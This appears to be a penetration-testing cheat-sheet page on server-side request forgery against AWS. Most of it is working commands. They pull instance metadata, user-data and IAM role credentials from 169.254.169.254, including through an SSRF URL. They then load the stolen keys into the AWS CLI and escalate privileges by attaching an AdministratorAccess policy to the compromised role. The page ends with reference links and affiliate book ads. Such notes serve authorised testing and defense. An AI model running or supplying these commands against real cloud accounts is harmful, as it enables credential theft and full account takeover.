SSRF / RCE

SSRF

AWS

AWS

AWS Metadata

• IMDV1

curl http://169.254.169.254/latest/meta-data/

• IMDV2

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

TOKEN=$(curl -XPUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/ -H "X-aws-ec2-metadata-token: $TOKEN"

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN” 

curl -H "X-aws-ec2-metadata-token: $(curl -s -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600')" http://169.254.169.254/latest/meta-data/

AWS Userdata

• IMDV1

curl http://169.254.169.254/latest/user-data/

• IMDV2

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/

Metadata

http://target.pwn/status/status.php?name=169.254.169.254/latest/meta-data/

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role

aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2

Get the Managed Policy Attached to EC2 Instance :

 aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor

Retrieves the specified inline policy document that is embedded on the ec2 instance role :

aws iam list-role-policies --role-name jump-ec2-role --profile auditor

Get the permissions in inline policy :

aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor

Escalate privilege by attaching administrator policy to itself :

aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name jump-ec2-role --profile ec2

Using a redirector

Old Services, New Tricks: Cloud Metadata Abuse by UNC2903 | Google Cloud BlogGoogle Cloud Blog

Inside PDF

Finding SSRF via HTML Injection inside a PDF file on AWS EC2Medium

Unauthorized Access to Metadata and User Data

GitHub - Lu3ky13/Unauthorized-Access-to-Metadata-and-User-Data-like-CTF: Unauthorized Access to Metadata and User Data like CTFGitHub

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment

• Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud